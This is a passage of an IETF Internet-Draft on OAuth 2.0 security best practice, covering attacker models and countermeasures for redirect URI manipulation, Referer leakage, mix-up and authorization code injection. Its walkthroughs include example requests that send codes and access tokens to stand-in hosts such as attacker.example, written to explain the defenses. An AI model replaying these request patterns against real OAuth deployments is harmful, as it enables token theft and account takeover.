Internet-Draft | OAuth 2.0 Security BCP | June 2024 |
Lodderstedt, et al. | Expires 5 December 2024 | [Page] |
This document describes best current security practice for OAuth 2.0. It updates and extends the threat model and security advice given in RFC 6749, RFC 6750, and RFC 6819 to incorporate practical experiences gathered since OAuth 2.0 was published and covers new threats relevant due to the broader application of OAuth 2.0. Further, it deprecates some modes of operation that are deemed less secure or even insecure.¶
This note is to be removed before publishing as an RFC.¶
Discussion of this document takes place on the Web Authorization Protocol Working Group mailing list ([email protected]), which is archived at https://mailarchive.ietf.org/arch/browse/oauth/.¶
Source for this draft and an issue tracker can be found at https://github.com/oauthstuff/draft-ietf-oauth-security-topics.¶
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Copyright (c) 2024 IETF Trust and the persons identified as the document authors. All rights reserved.¶
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Since its publication in [RFC6749] and [RFC6750], OAuth 2.0 (referred to as simply "OAuth" in the following) has gained massive traction in the market and became the standard for API protection and the basis for federated login using OpenID Connect [OpenID.Core]. While OAuth is used in a variety of scenarios and different kinds of deployments, the following challenges can be observed:¶
OAuth implementations are being attacked through known implementation weaknesses and anti-patterns (i.e., well-known patterns that are considered insecure). Although most of these threats are discussed in the OAuth 2.0 Threat Model and Security Considerations [RFC6819], continued exploitation demonstrates a need for more specific recommendations, easier to implement mitigations, and more defense in depth.¶
OAuth is being used in environments with higher security requirements than considered initially, such as Open Banking, eHealth, eGovernment, and Electronic Signatures. Those use cases call for stricter guidelines and additional protection.¶
OAuth is being used in much more dynamic setups than originally anticipated, creating new challenges with respect to security. Those challenges go beyond the original scope of [RFC6749], [RFC6750], and [RFC6819].¶
OAuth initially assumed static relationships between clients, authorization servers, and resource servers. The URLs of the servers were known to the client at deployment time and built an anchor for the trust relationships among those parties. The validation of whether the client is talking to a legitimate server was based on TLS server authentication (see [RFC6819], Section 4.5.4). With the increasing adoption of OAuth, this simple model dissolved and, in several scenarios, was replaced by a dynamic establishment of the relationship between clients on one side and the authorization and resource servers of a particular deployment on the other side. This way, the same client could be used to access services of different providers (in case of standard APIs, such as e-mail or OpenID Connect) or serve as a front end to a particular tenant in a multi-tenant environment. Extensions of OAuth, such as the OAuth 2.0 Dynamic Client Registration Protocol [RFC7591] and OAuth 2.0 Authorization Server Metadata [RFC8414] were developed to support the use of OAuth in dynamic scenarios.¶
Technology has changed. For example, the way browsers treat fragments when redirecting requests has changed, and with it, the implicit grant's underlying security model.¶
This document provides updated security recommendations to address these challenges. It introduces new requirements beyond those defined in existing specifications such as OAuth 2.0 [RFC6749] and OpenID Connect [OpenID.Core] and deprecates some modes of operation that are deemed less secure or even insecure. However, this document does not supplant the security advice given in [RFC6749], [RFC6750], and [RFC6819], but complements those documents.¶
Naturally, not all existing ecosystems and implementations are compatible with the new requirements and following the best practices described in this document may break interoperability. Nonetheless, it is RECOMMENDED that implementers upgrade their implementations and ecosystems as soon as feasible.¶
OAuth 2.1, under developement as [I-D.ietf-oauth-v2-1], will incorporate security recommendations from this document.¶
The remainder of this document is organized as follows: The next section summarizes the most important best practices for every OAuth implementor. Afterwards, the updated OAuth attacker model is presented. Subsequently, a detailed analysis of the threats and implementation issues that can be found in the wild today is given along with a discussion of potential countermeasures.¶
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "NOT RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in BCP 14 [RFC2119] [RFC8174] when, and only when, they appear in all capitals, as shown here.¶
This specification uses the terms "access token", "authorization endpoint", "authorization grant", "authorization server", "client", "client identifier" (client ID), "protected resource", "refresh token", "resource owner", "resource server", and "token endpoint" defined by OAuth 2.0 [RFC6749].¶
An "open redirector" is an endpoint on a web server that forwards a user’s browser to an arbitrary URI obtained from a query parameter.¶
This section describes the core set of security mechanisms and measures that are considered to be best practices at the time of writing. Details about these security mechanisms and measures (including detailed attack descriptions) and requirements for less commonly used options are provided in Section 4.¶
When comparing client redirect URIs against pre-registered URIs, authorization
servers MUST utilize exact string matching except for port numbers in
localhost
redirection URIs of native apps (see Section 4.1.3). This
measure contributes to the prevention of leakage of authorization codes and
access tokens (see Section 4.1). It can also help to detect
mix-up attacks (see Section 4.4).¶
Clients and authorization servers MUST NOT expose URLs that forward the user's browser to arbitrary URIs obtained from a query parameter (open redirectors) as described in Section 4.11. Open redirectors can enable exfiltration of authorization codes and access tokens.¶
Clients MUST prevent Cross-Site Request Forgery (CSRF). In this
context, CSRF refers to requests to the redirection endpoint that do
not originate at the authorization server, but a malicious third party
(see Section 4.4.1.8. of [RFC6819] for details). Clients that have
ensured that the authorization server supports Proof Key for Code Exchange (PKCE, [RFC7636]) MAY
rely on the CSRF protection provided by PKCE. In OpenID Connect flows,
the nonce
parameter provides CSRF protection. Otherwise, one-time
use CSRF tokens carried in the state
parameter that are securely
bound to the user agent MUST be used for CSRF protection (see
Section 4.7.1).¶
When an OAuth client can interact with more than one authorization server, a defense against mix-up attacks (see Section 4.4) is REQUIRED. To this end, clients SHOULD¶
iss
parameter as a countermeasure according to
[RFC9207], or¶
iss
value in the
authorization response (such as the iss
Claim in the ID Token in
[OpenID.Core] or in [OpenID.JARM] responses), processing it as described in
[RFC9207].¶
In the absence of these options, clients MAY instead use distinct redirect URIs to identify authorization endpoints and token endpoints, as described in Section 4.4.2.¶
An authorization server that redirects a request potentially containing user credentials MUST avoid forwarding these user credentials accidentally (see Section 4.12 for details).¶
Clients MUST prevent authorization code injection attacks (see Section 4.5) and misuse of authorization codes using one of the following options:¶
nonce
parameter and the
respective Claim in the ID Token instead.¶
In any case, the PKCE challenge or OpenID Connect nonce
MUST be
transaction-specific and securely bound to the client and the user agent in
which the transaction was started.
Authorization servers are encouraged to make a reasonable effort at detecting and
preventing the use of constant PKCE challenge or OpenID Connect nonce
values.¶
Note: Although PKCE was designed as a mechanism to protect native apps, this advice applies to all kinds of OAuth clients, including web applications.¶
When using PKCE, clients SHOULD use PKCE code challenge methods that
do not expose the PKCE verifier in the authorization request.
Otherwise, attackers that can read the authorization request (cf.
Attacker A4 in Section 3) can break the security provided
by PKCE. Currently, S256
is the only such method.¶
Authorization servers MUST support PKCE [RFC7636].¶
If a client sends a valid PKCE [RFC7636] code_challenge
parameter in the
authorization request, the authorization server MUST enforce the correct usage
of code_verifier
at the token endpoint.¶
Authorization servers MUST mitigate PKCE Downgrade Attacks by ensuring that a
token request containing a code_verifier
parameter is accepted only if a
code_challenge
parameter was present in the authorization request, see
Section 4.8.2 for details.¶
Authorization servers MUST provide a way to detect their support for
PKCE. It is RECOMMENDED for authorization servers to publish the element
code_challenge_methods_supported
in their Authorization Server Metadata ([RFC8414])
containing the supported PKCE challenge methods (which can be used by
the client to detect PKCE support). Authorization servers MAY instead provide a
deployment-specific way to ensure or determine PKCE support by the authorization server.¶
The implicit grant (response type "token") and other response types causing the authorization server to issue access tokens in the authorization response are vulnerable to access token leakage and access token replay as described in Section 4.1, Section 4.2, Section 4.3, and Section 4.6.¶
Moreover, no standardized method for sender-constraining exists to bind access tokens to a specific client (as recommended in Section 2.2) when the access tokens are issued in the authorization response. This means that an attacker can use the leaked or stolen access token at a resource endpoint.¶
In order to avoid these issues, clients SHOULD NOT use the implicit grant (response type "token") or other response types issuing access tokens in the authorization response, unless access token injection in the authorization response is prevented and the aforementioned token leakage vectors are mitigated.¶
Clients SHOULD instead use the response type code
(i.e., authorization
code grant type) as specified in Section 2.1.1 or any other response type that
causes the authorization server to issue access tokens in the token
response, such as the code id_token
response type. This allows the
authorization server to detect replay attempts by attackers and
generally reduces the attack surface since access tokens are not
exposed in URLs. It also allows the authorization server to
sender-constrain the issued tokens (see next section).¶
A sender-constrained access token scopes the applicability of an access token to a certain sender. This sender is obliged to demonstrate knowledge of a certain secret as a prerequisite for the acceptance of that token at the recipient (e.g., a resource server).¶
Authorization and resource servers SHOULD use mechanisms for sender-constraining access tokens, such as Mutual TLS for OAuth 2.0 [RFC8705] or OAuth 2.0 Demonstrating Proof of Possession (DPoP) [RFC9449] (see Section 4.10.1), to prevent misuse of stolen and leaked access tokens.¶
Refresh tokens for public clients MUST be sender-constrained or use refresh token rotation as described in Section 4.14. [RFC6749] already mandates that refresh tokens for confidential clients can only be used by the client for which they were issued.¶
The privileges associated with an access token SHOULD be restricted to the minimum required for the particular application or use case. This prevents clients from exceeding the privileges authorized by the resource owner. It also prevents users from exceeding their privileges authorized by the respective security policy. Privilege restrictions also help to reduce the impact of access token leakage.¶
In particular, access tokens SHOULD be audience-restricted to a specific resource
server, or, if that is not feasible, to a small set of resource servers. To put this into effect, the authorization server associates
the access token with certain resource servers and every resource
server is obliged to verify, for every request, whether the access
token sent with that request was meant to be used for that particular
resource server. If it was not, the resource server MUST refuse to serve the
respective request. The aud
claim as defined in [RFC9068] MAY be
used to audience-restrict access tokens. Clients and authorization servers MAY utilize the
parameters scope
or resource
as specified in [RFC6749] and
[RFC8707], respectively, to determine the
resource server they want to access.¶
Additionally, access tokens SHOULD be restricted to certain resources
and actions on resource servers or resources. To put this into effect,
the authorization server associates the access token with the
respective resource and actions and every resource server is obliged
to verify, for every request, whether the access token sent with that
request was meant to be used for that particular action on the
particular resource. If not, the resource server must refuse to serve
the respective request. Clients and authorization servers MAY utilize
the parameter scope
as specified in [RFC6749] and authorization_details
as specified in [RFC9396] to determine those
resources and/or actions.¶
The resource owner password credentials grant [RFC6749] MUST NOT be used. This grant type insecurely exposes the credentials of the resource owner to the client. Even if the client is benign, this results in an increased attack surface (credentials can leak in more places than just the authorization server) and users are trained to enter their credentials in places other than the authorization server.¶
Furthermore, the resource owner password credentials grant is not designed to work with two-factor authentication and authentication processes that require multiple user interaction steps. Authentication with cryptographic credentials (cf. WebCrypto [W3C.WebCrypto], WebAuthn [W3C.WebAuthn]) may be impossible to implement with this grant type, as it is usually bound to a specific web origin.¶
Authorization servers SHOULD enforce client authentication if it is feasible, in the particular deployment, to establish a process for issuance/registration of credentials for clients and ensuring the confidentiality of those credentials.¶
It is RECOMMENDED to use asymmetric cryptography for
client authentication, such as mTLS [RFC8705] or signed JWTs
("Private Key JWT") in accordance with [RFC7521] and [RFC7523]
(in [OpenID.Core] defined as the client authentication method private_key_jwt
).
When asymmetric cryptography for client authentication is used, authorization
servers do not need to store sensitive symmetric keys, making these
methods more robust against leakage of keys.¶
The use of OAuth Authorization Server Metadata [RFC8414] can help to improve the security of OAuth deployments:¶
It is therefore RECOMMENDED that authorization servers publish OAuth Authorization Server Metadata according to [RFC8414] and that clients make use of this Authorization Server Metadata to configure themselves when available.¶
Under the conditions described in Section 4.15.1,
authorization servers SHOULD NOT allow clients to influence their client_id
or
any claim that could cause confusion with a genuine resource owner.¶
It is RECOMMENDED to use end-to-end TLS according to [BCP195] between the client and the resource server. If TLS traffic needs to be terminated at an intermediary, refer to Section 4.13 for further security advice.¶
Authorization responses MUST NOT be transmitted over unencrypted network
connections. To this end, authorization servers MUST NOT allow redirect URIs that use the http
scheme except for native clients that use Loopback Interface Redirection as
described in [RFC8252], Section 7.3.¶
If the authorization response is sent with in-browser communication techniques like postMessage [WHATWG.postmessage_api] instead of HTTP redirects, both the initiator and receiver of the in-browser message MUST be strictly verified as described in Section 4.17.¶
To support browser-based clients, endpoints directly accessed by such clients
including the Token Endpoint, Authorization Server Metadata Endpoint, jwks_uri
Endpoint, and the Dynamic Client Registration Endpoint MAY support the use of
Cross-Origin Resource Sharing (CORS, [WHATWG.CORS]). However, CORS MUST NOT be
supported at the Authorization Endpoint, as the client does not access this
endpoint directly; instead, the client redirects the user agent to it.¶
In [RFC6819], a threat model is laid out that describes the threats against which OAuth deployments must be protected. While doing so, [RFC6819] makes certain assumptions about attackers and their capabilities, i.e., implicitly establishes an attacker model. In the following, this attacker model is made explicit and is updated and expanded to account for the potentially dynamic relationships involving multiple parties (as described in Section 1), to include new types of attackers and to define the attacker model more clearly.¶
The goal of this document is to ensure that the authorization of a resource owner (with a user agent) at an authorization server and the subsequent usage of the access token at a resource server is protected, as well as practically possible, at least against the following attackers:¶
(A1) Web Attackers that can set up and operate an arbitrary number of network endpoints (besides the "honest" ones) including browsers and servers. Web attackers may set up web sites that are visited by the resource owner, operate their own user agents, and participate in the protocol.¶
Web attackers may, in particular, operate OAuth clients that are registered at the authorization server, and operate their own authorization and resource servers that can be used (in parallel to the "honest" ones) by the resource owner and other resource owners.¶
It must also be assumed that web attackers can lure the user to navigate their browser to arbitrary attacker-chosen URIs at any time. In practice, this can be achieved in many ways, for example, by injecting malicious advertisements into advertisement networks, or by sending legitimate-looking emails.¶
Web attackers can use their own user credentials to create new messages as well as any secrets they learned previously. For example, if a web attacker learns an authorization code of a user through a misconfigured redirect URI, the web attacker can then try to redeem that code for an access token.¶
They cannot, however, read or manipulate messages that are not targeted towards them (e.g., sent to a URL controlled by a non-attacker controlled authorization server).¶
(A2) Network Attackers that additionally have full control over the network over which protocol participants communicate. They can eavesdrop on, manipulate, and spoof messages, except when these are properly protected by cryptographic methods (e.g., TLS). Network attackers can also block arbitrary messages.¶
While an example for a web attacker would be a customer of an internet service provider, network attackers could be the internet service provider itself, an attacker in a public (Wi-Fi) network using ARP spoofing, or a state-sponsored attacker with access to internet exchange points, for instance.¶
The aforementioned attackers (A1) and (A2) conform to the attacker model that was used in formal analysis efforts for OAuth [arXiv.1601.01229]. This is a minimal attacker model. Implementers MUST take into account all possible types of attackers in the environment of their OAuth implementations. For example, in [arXiv.1901.11520], a very strong attacker model is used that includes attackers that have full control over the token endpoint. This models effects of a possible misconfiguration of endpoints in the ecosystem, which can be avoided by using authorization server metadata as described in Section 2.6. Such an attacker is therefore not listed here.¶
However, previous attacks on OAuth have shown that the following types of attackers are relevant in particular:¶
(A3) Attackers that can read, but not modify, the contents of the authorization response (i.e., the authorization response can leak to an attacker).¶
Examples for such attacks include open redirector attacks, insufficient checking of redirect URIs (see Section 4.1), problems existing on mobile operating systems (where different apps can register themselves on the same URI), mix-up attacks (see Section 4.4), where the client is tricked into sending credentials to an attacker-controlled authorization server, and the fact that URLs are often stored/logged by browsers (history), proxy servers, and operating systems.¶
(A4) Attackers that can read, but not modify, the contents of the authorization request (i.e., the authorization request can leak, in the same manner as above, to an attacker).¶
(A5) Attackers that can acquire an access token issued by an authorization server. For example, a resource server can be compromised by an attacker, an access token may be sent to an attacker-controlled resource server due to a misconfiguration, or a resource owner is social-engineered into using an attacker-controlled resource server. Also see Section 4.9.2.¶
(A3), (A4) and (A5) typically occur together with either (A1) or (A2). Attackers can collaborate to reach a common goal.¶
Note that an attacker (A1) or (A2) can be a resource owner or act as one. For example, such an attacker can use their own browser to replay tokens or authorization codes obtained by any of the attacks described above at the client or resource server.¶
This document focuses on threats resulting from attackers (A1) to (A5).¶
This section gives a detailed description of attacks on OAuth implementations, along with potential countermeasures. Attacks and mitigations already covered in [RFC6819] are not listed here, except where new recommendations are made.¶
This section further defines additional requirements beyond those defined in Section 2 for certain cases and protocol options.¶
Some authorization servers allow clients to register redirect URI patterns instead of complete redirect URIs. The authorization servers then match the redirect URI parameter value at the authorization endpoint against the registered patterns at runtime. This approach allows clients to encode transaction state into additional redirect URI parameters or to register a single pattern for multiple redirect URIs.¶
This approach turned out to be more complex to implement and more error-prone to manage than exact redirect URI matching. Several successful attacks exploiting flaws in the pattern-matching implementation or concrete configurations have been observed in the wild (see, e.g., [research.rub2]). Insufficient validation of the redirect URI effectively breaks client identification or authentication (depending on grant and client type) and allows the attacker to obtain an authorization code or access token, either¶
These attacks are shown in detail in the following subsections.¶
For a client using the grant type code
, an attack may work as
follows:¶
Assume the redirect URL pattern https://*.somesite.example/*
is
registered for the client with the client ID s6BhdRkqt3
. The
intention is to allow any subdomain of somesite.example
to be a
valid redirect URI for the client, for example
https://app1.somesite.example/redirect
. A naive implementation on
the authorization server, however, might interpret the wildcard *
as
"any character" and not "any character valid for a domain name". The
authorization server, therefore, might permit
https://attacker.example/.somesite.example
as a redirect URI,
although attacker.example
is a different domain potentially
controlled by a malicious party.¶
The attack can then be conducted as follows:¶
To begin, the attacker needs to trick the user into opening a tampered
URL in their browser that launches a page under the attacker's
control, say https://www.evil.example
(see Attacker A1 in Section 3).¶
This URL initiates the following authorization request with the client ID of a legitimate client to the authorization endpoint (line breaks for display only):¶
GET /authorize?response_type=code&client_id=s6BhdRkqt3&state=9ad67f13 &redirect_uri=https%3A%2F%2Fattacker.example%2F.somesite.example HTTP/1.1 Host: server.somesite.example¶
The authorization server validates the redirect URI and compares it to
the registered redirect URL patterns for the client s6BhdRkqt3
.
The authorization request is processed and presented to the user.¶
If the user does not see the redirect URI or does not recognize the attack, the code is issued and immediately sent to the attacker's domain. If an automatic approval of the authorization is enabled (which is not recommended for public clients according to [RFC6749]), the attack can be performed even without user interaction.¶
If the attacker impersonates a public client, the attacker can exchange the code for tokens at the respective token endpoint.¶
This attack will not work as easily for confidential clients, since the code exchange requires authentication with the legitimate client's secret. The attacker can, however, use the legitimate confidential client to redeem the code by performing an authorization code injection attack, see Section 4.5.¶
It is important to note that redirect URI validation vulnerabilities can also exist if the authorization
server handles wildcards properly. For example, assume that the client
registers the redirect URL pattern https://*.somesite.example/*
and
the authorization server interprets this as "allow redirect URIs
pointing to any host residing in the domain somesite.example
". If an
attacker manages to establish a host or subdomain in
somesite.example
, the attacker can impersonate the legitimate client. This
could be caused, for example, by a subdomain takeover attack [research.udel], where an
outdated CNAME record (say, external-service.somesite.example
)
points to an external DNS name that does no longer exist (say,
customer-abc.service.example
) and can be taken over by an attacker
(e.g., by registering as customer-abc
with the external service).¶
The attack described above works for the implicit grant as well. If the attacker is able to send the authorization response to an attacker-controlled URI, the attacker will directly get access to the fragment carrying the access token.¶
Additionally, implicit grants (and also other grants when using response_mode=fragment
as defined in [OAuth.Responses]) can be subject to a further kind of
attack. It utilizes the fact that user agents re-attach fragments to
the destination URL of a redirect if the location header does not
contain a fragment (see [RFC9110], Section 17.11). The attack
described here combines this behavior with the client as an open
redirector (see Section 4.11.1) in order to obtain access tokens. This allows
circumvention even of very narrow redirect URI patterns, but not strict URL
matching.¶
Assume the registered URL pattern for client s6BhdRkqt3
is
https://client.somesite.example/cb?*
, i.e., any parameter is allowed
for redirects to https://client.somesite.example/cb
. Unfortunately,
the client exposes an open redirector. This endpoint supports a
parameter redirect_to
which takes a target URL and will send the
browser to this URL using an HTTP Location header redirect 303.¶
The attack can now be conducted as follows:¶
To begin, as above, the attacker needs to trick the user into opening
a tampered URL in their browser that launches a page under the
attacker's control, say https://www.evil.example
.¶
Afterwards, the website initiates an authorization request that is
very similar to the one in the attack on the code flow. Different to
above, it utilizes the open redirector by encoding
redirect_to=https://attacker.example
into the parameters of the
redirect URI and it uses the response type "token" (line breaks for display only):¶
GET /authorize?response_type=token&state=9ad67f13 &client_id=s6BhdRkqt3 &redirect_uri=https%3A%2F%2Fclient.somesite.example %2Fcb%26redirect_to%253Dhttps%253A%252F %252Fattacker.example%252F HTTP/1.1 Host: server.somesite.example¶
Now, since the redirect URI matches the registered pattern, the authorization server permits the request and sends the resulting access token in a 303 redirect (some response parameters omitted for readability):¶
HTTP/1.1 303 See Other Location: https://client.somesite.example/cb? redirect_to%3Dhttps%3A%2F%2Fattacker.example%2Fcb #access_token=2YotnFZFEjr1zCsicMWpAA&...¶
At client.somesite.example, the request arrives at the open redirector. The endpoint will
read the redirect parameter and will issue an HTTP 303 Location header
redirect to the URL https://attacker.example/
.¶
HTTP/1.1 303 See Other Location: https://attacker.example/¶
Since the redirector at client.somesite.example does not include a
fragment in the Location header, the user agent will re-attach the
original fragment #access_token=2YotnFZFEjr1zCsicMWpAA&...
to
the URL and will navigate to the following URL:¶
https://attacker.example/#access_token=2YotnFZFEjr1z...¶
The attacker's page at attacker.example
can now access the
fragment and obtain the access token.¶
The complexity of implementing and managing pattern matching correctly obviously
causes security issues. This document therefore advises simplifying the required
logic and configuration by using exact redirect URI matching. This means the
authorization server MUST ensure that the two URIs are equal, see [RFC3986],
Section 6.2.1, Simple String Comparison, for details. The only exception is
native apps using a localhost
URI: In this case, the authorization server MUST allow variable
port numbers as described in [RFC8252], Section 7.3.¶
Additional recommendations:¶
#_
, to URLs in Location headers.¶
If the origin and integrity of the authorization request containing the redirect URI can be verified, for example when using [RFC9101] or [RFC9126] with client authentication, the authorization server MAY trust the redirect URI without further checks.¶
The contents of the authorization request URI or the authorization
response URI can unintentionally be disclosed to attackers through the
Referer HTTP header (see [RFC9110], Section 10.1.3), by leaking either
from the authorization server's or the client's website, respectively. Most
importantly, authorization codes or state
values can be disclosed in
this way. Although specified otherwise in [RFC9110], Section 10.1.3,
the same may happen to access tokens conveyed in URI fragments due to
browser implementation issues, as illustrated by a (now fixed) issue in the Chromium project [bug.chromium].¶
Leakage from the OAuth client requires that the client, as a result of a successful authorization request, renders a page that¶
As soon as the browser navigates to the attacker's page or loads the
third-party content, the attacker receives the authorization response
URL and can extract code
or state
(and potentially access_token
).¶
An attacker that learns a valid code or access token through a
Referer header can perform the attacks as described in
Section 4.1.1, Section 4.5, and
Section 4.6. If the attacker learns state
, the CSRF
protection achieved by using state
is lost, resulting in CSRF
attacks as described in [RFC6819], Section 4.4.1.8.¶
The page rendered as a result of the OAuth authorization response and the authorization endpoint SHOULD NOT include third-party resources or links to external sites.¶
The following measures further reduce the chances of a successful attack:¶
Referrer-Policy:
no-referrer
in the response completely suppresses the Referer
header in all requests originating from the resulting document.¶
As described in [RFC6749], Section 4.1.2, authorization codes MUST be invalidated by the authorization server after their first use at the token endpoint. For example, if an authorization server invalidated the code after the legitimate client redeemed it, the attacker would fail to exchange this code later.¶
This does not mitigate the attack if the attacker manages to exchange the code for a token before the legitimate client does so. Therefore, [RFC6749] further recommends that, when an attempt is made to redeem a code twice, the authorization server SHOULD revoke all tokens issued previously based on that code.¶
The state
value SHOULD be invalidated by the client after its
first use at the redirection endpoint. If this is implemented, and
an attacker receives a token through the Referer header from the
client's website, the state
was already used, invalidated by
the client and cannot be used again by the attacker. (This does
not help if the state
leaks from the
authorization server's website, since then the state
has not been used at the redirection endpoint at the client yet.)¶
Use the form post response mode instead of a redirect for the authorization response (see [OAuth.Post]).¶
Authorization codes and access tokens can end up in the browser's history of visited URLs, enabling the attacks described in the following.¶
An access token may end up in the browser history if a client or a web
site that already has a token deliberately navigates to a page like
provider.com/get_user_profile?access_token=abcdef
. [RFC6750]
discourages this practice and advises transferring tokens via a header,
but in practice web sites often pass access tokens in query
parameters.¶
In the case of implicit grant, a URL like
client.example/redirection_endpoint#access_token=abcdef
may also end
up in the browser history as a result of a redirect from a provider's
authorization endpoint.¶
Countermeasures:¶
Mix-up is an attack on scenarios where an OAuth client interacts with two or more authorization servers and at least one authorization server is under the control of the attacker. This can be the case, for example, if the attacker uses dynamic registration to register the client at their own authorization server or if an authorization server becomes compromised.¶
The goal of the attack is to obtain an authorization code or an access token for an uncompromised authorization server. This is achieved by tricking the client into sending those credentials to the compromised authorization server (the attacker) instead of using them at the respective endpoint of the uncompromised authorization/resource server.¶
The description here follows [arXiv.1601.01229], with variants of the attack outlined below.¶
Preconditions: For this variant of the attack to work, it is assumed that¶
In the following, it is further assumed that the client is registered with H-AS (URI:
https://honest.as.example
, client ID: 7ZGZldHQ
) and with A-AS (URI:
https://attacker.example
, client ID: 666RVZJTA
). URLs shown in the following
example are shortened for presentation to only include parameters relevant to the
attack.¶
Attack on the authorization code grant:¶
https://attacker.example/authorize?response_type=code&client_id=666RVZJTA
.¶
303 See Other
) with a Location header pointing to
https://honest.as.example/authorize?response_type=code&client_id=7ZGZldHQ
¶
The user authorizes the client to access their resources at H-AS. (Note that a vigilant user might at this point detect that they intended to use A-AS instead of H-AS. The first attack variant listed below avoids this.) H-AS issues a code and sends it (via the browser) back to the client.¶
Since the client still assumes that the code was issued by A-AS, it will try to redeem the code at A-AS's token endpoint.¶
The attacker therefore obtains code and can either exchange the code for an access token (for public clients) or perform an authorization code injection attack as described in Section 4.5.¶
Variants:¶
When an OAuth client can only interact with one authorization server, a mix-up defense is not required. In scenarios where an OAuth client interacts with two or more authorization servers, however, clients MUST prevent mix-up attacks. Two different methods are discussed in the following.¶
For both defenses, clients MUST store, for each authorization request, the issuer they sent the authorization request to and bind this information to the user agent. The issuer serves, via the associated metadata, as an abstract identifier for the combination of the authorization endpoint and token endpoint that are to be used in the flow. If an issuer identifier is not available, for example, if neither OAuth Authorization Server Metadata [RFC8414] nor OpenID Connect Discovery [OpenID.Discovery] is used, a different unique identifier for this tuple or the tuple itself can be used instead. For brevity of presentation, such a deployment-specific identifier will be subsumed under the issuer (or issuer identifier) in the following.¶
It is important to note that just storing the authorization server URL is not sufficient to identify mix-up attacks. An attacker might declare an uncompromised authorization server's authorization endpoint URL as "their" authorization server URL, but declare a token endpoint under their own control.¶
This defense requires that the authorization server sends its issuer identifier in the authorization response to the client. When receiving the authorization response, the client MUST compare the received issuer identifier to the stored issuer identifier. If there is a mismatch, the client MUST abort the interaction.¶
There are different ways this issuer identifier can be transported to the client:¶
iss
, defined in
[RFC9207].¶
iss
claim in the ID Token.¶
In both cases, the iss
value MUST be evaluated according to [RFC9207].¶
While this defense may require deploying new OAuth features to transport the issuer information, it is a robust and relatively simple defense against mix-up.¶
For this defense, clients MUST use a distinct redirect URI for each issuer they interact with.¶
Clients MUST check that the authorization response was received from the correct issuer by comparing the distinct redirect URI for the issuer to the URI where the authorization response was received on. If there is a mismatch, the client MUST abort the flow.¶
While this defense builds upon existing OAuth functionality, it cannot be used in scenarios where clients only register once for the use of many different issuers (as in some open banking schemes) and due to the tight integration with the client registration, it is harder to deploy automatically.¶
Furthermore, an attacker might be able to circumvent the protection offered by this defense by registering a new client with the "honest" authorization server using the redirect URI that the client assigned to the attacker's authorization server. The attacker could then run the attack as described above, replacing the client ID with the client ID of their newly created client.¶
This defense SHOULD therefore only be used if other options are not available.¶
An attacker who has gained access to an authorization code contained in an authorization response (see Attacker A3 in Section 3) can try to redeem the authorization code for an access token or otherwise make use of the authorization code.¶
In the case that the authorization code was created for a public client, the attacker can send the authorization code to the token endpoint of the authorization server and thereby get an access token. This attack was described in Section 4.4.1.1 of [RFC6819].¶
For confidential clients, or in some special situations, the attacker can execute an authorization code injection attack, as described in the following.¶
In an authorization code injection attack, the attacker attempts to inject a stolen authorization code into the attacker's own session with the client. The aim is to associate the attacker's session at the client with the victim's resources or identity, thereby giving the attacker at least limited access to the victim's resources.¶
Besides circumventing the client authentication of confidential clients, other use cases for this attack include:¶
Except in these special cases, authorization code injection is usually not interesting when the code is created for a public client, as sending the code to the token endpoint is a simpler and more powerful attack, as described above.¶
The authorization code injection attack works as follows:¶
redirect_uri
and the client's client ID and
client secret (or other means of client authentication).¶
redirect_uri
parameter (see
[RFC6749]).¶
Obviously, the check-in step (5.) will fail if the code was issued to another client ID, e.g., a client set up by the attacker. The check will also fail if the authorization code was already redeemed by the legitimate user and was one-time use only.¶
An attempt to inject a code obtained via a manipulated redirect URI
should also be detected if the authorization server stored the
complete redirect URI used in the authorization request and compares
it with the redirect_uri
parameter.¶
[RFC6749], Section 4.1.3, requires the authorization server to "... ensure that the
redirect_uri
parameter is present if the redirect_uri
parameter
was included in the initial authorization request as described in
Section 4.1.1, and if included ensure that their values are
identical.". In the attack scenario described above, the legitimate
client would use the correct redirect URI it always uses for
authorization requests. But this URI would not match the tampered
redirect URI used by the attacker (otherwise, the redirect would not
land at the attacker's page). So the authorization server would detect
the attack and refuse to exchange the code.¶
This check could also detect attempts to inject an authorization code that had been obtained from another instance of the same client on another device if certain conditions are fulfilled:¶
But this approach conflicts with the idea of enforcing exact redirect
URI matching at the authorization endpoint. Moreover, it has been
observed that providers very often ignore the redirect_uri
check
requirement at this stage, maybe because it doesn't seem to be
security-critical from reading the specification.¶
Other providers just pattern match the redirect_uri
parameter
against the registered redirect URI pattern. This saves the
authorization server from storing the link between the actual redirect
URI and the respective authorization code for every transaction. But
this kind of check obviously does not fulfill the intent of the
specification, since the tampered redirect URI is not considered. So
any attempt to inject an authorization code obtained using the
client_id
of a legitimate client or by utilizing the legitimate
client on another device will not be detected in the respective
deployments.¶
It is also assumed that the requirements defined in [RFC6749], Section 4.1.3, increase client implementation complexity as clients need to store or re-construct the correct redirect URI for the call to the token endpoint.¶
Asymmetric methods for client authentication do not stop this attack, as the legitimate client authenticates at the token endpoint.¶
This document therefore recommends instead binding every authorization code to a certain client instance on a certain device (or in a certain user agent) in the context of a certain transaction using one of the mechanisms described next.¶
There are two good technical solutions to binding authorization codes to client instances, outlined in the following.¶
The PKCE mechanism specified in [RFC7636] can be used as a countermeasure
(even though it was originally designed to secure native apps). When the
attacker attempts to inject an authorization code, the check of the
code_verifier
fails: the client uses its correct verifier, but the code is
associated with a code_challenge
that does not match this verifier.¶
PKCE does not only protect against the authorization code injection attack but
also protects authorization codes created for public clients: PKCE ensures that
an attacker cannot redeem a stolen authorization code at the token endpoint of
the authorization server without knowledge of the code_verifier
.¶
OpenID Connect's existing nonce
parameter can protect against authorization
code injection attacks. The nonce
value is one-time use and is created by the
client. The client is supposed to bind it to the user agent session and send it
with the initial request to the OpenID Provider (OP). The OP puts the received nonce
value into the ID Token that is issued
as part of the code exchange at the token endpoint. If an attacker injects an
authorization code in the authorization response, the nonce value in the client
session and the nonce value in the ID token received from the token endpoint will not match and the attack is
detected. The assumption is that an attacker cannot get hold of the user agent
state on the victim's device (from which the attacker has stolen the respective authorization
code).¶
It is important to note that this countermeasure only works if the client
properly checks the nonce
parameter in the ID Token obtained from the token endpoint and does not use any
issued token until this check has succeeded. More precisely, a client protecting
itself against code injection using the nonce
parameter¶
nonce
in the ID Token obtained from the token endpoint,
even if another ID Token was obtained from the authorization response
(e.g., response_type=code+id_token
), and¶
It is important to note that nonce
does not protect authorization codes of
public clients, as an attacker does not need to execute an authorization code
